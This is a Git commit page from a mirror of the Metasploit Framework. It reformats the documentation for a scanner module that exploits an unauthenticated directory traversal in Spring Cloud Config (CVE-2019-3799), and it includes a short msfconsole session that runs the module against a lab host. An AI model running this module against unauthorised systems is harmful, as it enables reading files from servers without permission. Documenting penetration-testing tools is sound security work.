infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updating documents

master
Dhiraj Mishra 2019-04-25 00:39:46 +04:00 committed by GitHub
parent 46421beda3
commit 447c8430e1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
documentation/modules/auxiliary/scanner/http/springcloud_traversal.md
View File

@ -1,10 +1,6 @@
## Vulnerable Application
## Description
his module exploits an unauthenticated directory traversal vulnerabilitywhich exists in spring cloud config, versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, which islistening by default on port 8888.
<b>Related links :</b>
* https://pivotal.io/security/cve-2019-3799
This module exploits an unauthenticated directory traversal vulnerability, which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, which is listening by default on port 8888.
## Verification
@ -17,6 +13,9 @@ run
## Scenarios
### Tested against
`Linux zero 4.15.0-48-generic #51-Ubuntu SMP Wed Apr 3 08:28:49 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux`
```
msf > use auxiliary/scanner/http/springcloud_traversal
msf auxiliary(scanner/http/springcloud_traversal) > set RHOSTS 192.168.1.132
@ -29,8 +28,9 @@ msf auxiliary(scanner/http/springcloud_traversal) > run
msf auxiliary(scanner/http/springcloud_traversal) >
```
<b>Tested against :</b><br>
`Linux zero 4.15.0-48-generic #51-Ubuntu SMP Wed Apr 3 08:28:49 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux`
<b>Vulnerable software link :</b>
### Vulnerable software link
* https://github.com/spring-cloud/spring-cloud-config/archive/v2.1.1.RELEASE.zip
### References
* https://pivotal.io/security/cve-2019-3799